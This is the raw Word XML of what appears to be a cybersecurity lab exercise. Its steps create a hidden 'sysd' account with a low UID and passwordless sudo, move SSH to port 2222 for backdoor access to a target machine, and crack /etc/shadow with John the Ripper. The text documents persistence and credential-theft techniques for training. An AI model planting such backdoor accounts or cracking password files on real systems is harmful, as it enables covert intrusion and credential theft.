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47B4D" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:r w:rsidRPr="00D67958">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Shadow People</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2B2757" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve">Create a secret user named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>. Make sure this user doesn't have a home folder created:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419123CD" w14:textId="127FA502" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve"> --system --no-create-home </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7817383A" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t>Give your secret user a password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4F139" w14:textId="74636BDF" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">passwd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D36DDC3" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t>Give your secret user a system UID &lt; 1000:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE67BAD" w14:textId="242F0160" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve"> -u 666 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51235CA9" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t>Give your secret user the same GID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A69DCE" w14:textId="02323A8C" w:rsidR="00D67958" w:rsidRDefault="00B43810" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B43810">
        <w:t>groupadd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B43810">
        <w:t xml:space="preserve"> -g 666 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B43810">
        <w:t>sysdgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BFCBE50" w14:textId="51A8301A" w:rsidR="00B43810" w:rsidRPr="00D67958" w:rsidRDefault="00B43810" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B43810">
        <w:t>usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B43810">
        <w:t xml:space="preserve"> -g 666 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B43810">
        <w:t>sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1700BC95" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve">Give your secret user full </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve"> access without the need for a password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F6451" w14:textId="64D3EF9D" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00B43810" w:rsidP="00D67958">
      <w:pPr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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AC83625" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve">Test that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve"> access works without your password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD1DE31" w14:textId="40C352DF" w:rsidR="00D67958" w:rsidRDefault="00B43810" w:rsidP="00D67958">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="204EFCA5" w14:textId="0F90B497" w:rsidR="000F2E31" w:rsidRPr="00D67958" w:rsidRDefault="000F2E31" w:rsidP="00D67958">
      <w:r w:rsidRPr="000F2E31">
        <w:t>This account is currently not available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745D2D8" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:r w:rsidRPr="00D67958">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Smooth Sailing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB68888" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve">Edit the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>sshd_config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve"> file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E6EAA7" w14:textId="2CC4ED99" w:rsidR="000F2E31" w:rsidRDefault="000F2E31" w:rsidP="00D67958">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F2E31">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F2E31">
        <w:t xml:space="preserve"> nano /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F2E31">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F2E31">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F2E31">
        <w:t>sshd_config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19DBD3C3" w14:textId="1821C764" w:rsidR="000F2E31" w:rsidRDefault="000F2E31" w:rsidP="00D67958">
      <w:r>
        <w:t>#Port 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB0D4F" w14:textId="29F146D2" w:rsidR="000F2E31" w:rsidRDefault="000F2E31" w:rsidP="00D67958">
      <w:r>
        <w:t>#AddressFamily any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836ABAD" w14:textId="577FFDC9" w:rsidR="000F2E31" w:rsidRDefault="000F2E31" w:rsidP="00D67958">
      <w:r>
        <w:t>#ListenAddress 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437FFC1" w14:textId="6599B1C5" w:rsidR="000F2E31" w:rsidRDefault="000F2E31" w:rsidP="00D67958">
      <w:r>
        <w:t>#ListenAddress ::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5445B5D8" w14:textId="77777777" w:rsidR="000F2E31" w:rsidRDefault="000F2E31" w:rsidP="00D67958"/>
    <w:p w14:paraId="141A84D4" w14:textId="7D2086F9" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:r w:rsidRPr="00D67958">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3: Testing Your Configuration Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58667FF9" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t>Restart the SSH service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F484DD1" w14:textId="06EDCFF5" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00F55D1A" w:rsidP="00D67958">
      <w:pPr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</w:t>
      </w:r>
      <w:r w:rsidR="000F2E31">
        <w:t>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14:paraId="43DE4D60" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t>Exit the root account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424B3EDB" w14:textId="4F202751" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00F55D1A" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB72F60" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve">SSH to the target machine using your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve"> account and port 2222:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA14B39" w14:textId="2B4D4AEF" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00AD4BDB" w:rsidP="00D67958">
      <w:pPr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hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00AD5A7C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>sysd@192.168.6.105</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCF78E9" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve"> to switch to the root user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655E6D1E" w14:textId="407E2241" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00AD4BDB" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728CF601" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:r w:rsidRPr="00D67958">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Crack All the Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C689F6" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve">SSH back to the system using your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D67958">
        <w:t>sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D67958">
        <w:t xml:space="preserve"> account and port 2222:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE202A" w14:textId="77777777" w:rsidR="00AD4BDB" w:rsidRPr="00D67958" w:rsidRDefault="00AD4BDB" w:rsidP="00AD4BDB">
      <w:pPr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hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00AD5A7C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>sysd@192.168.6.105</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069157B9" w14:textId="77777777" w:rsidR="00D67958" w:rsidRPr="00D67958" w:rsidRDefault="00D67958" w:rsidP="00D67958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67958">
        <w:t>Escalate your privileges to the root user. Use John to crack the entire /etc/shadow file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E83C191" w14:textId="4E89774F" w:rsidR="00B11947" w:rsidRPr="00D67958" w:rsidRDefault="00B11947" w:rsidP="00D67958">
      <w:pPr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john etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CBA231" w14:textId="77777777" w:rsidR="00D67958" w:rsidRDefault="00D67958"/>
    <w:sectPr w:rsidR="00D6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F276A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9586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653DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68CA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817E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBFA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854313"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCF0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58"/>
    <w:rsid w:val="000F2E31"/>
    <w:rsid w:val="00AD4BDB"/>
    <w:rsid w:val="00B11947"/>
    <w:rsid w:val="00B43810"/>
    <w:rsid w:val="00D67958"/>
    <w:rsid w:val="00F5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2814"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2E70149B-93C4-4A26-9260-D139CCFB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5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sd@192.168.6.105" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:sysd@192.168.6.1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Ivanfy</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-06T22:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-27T04:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>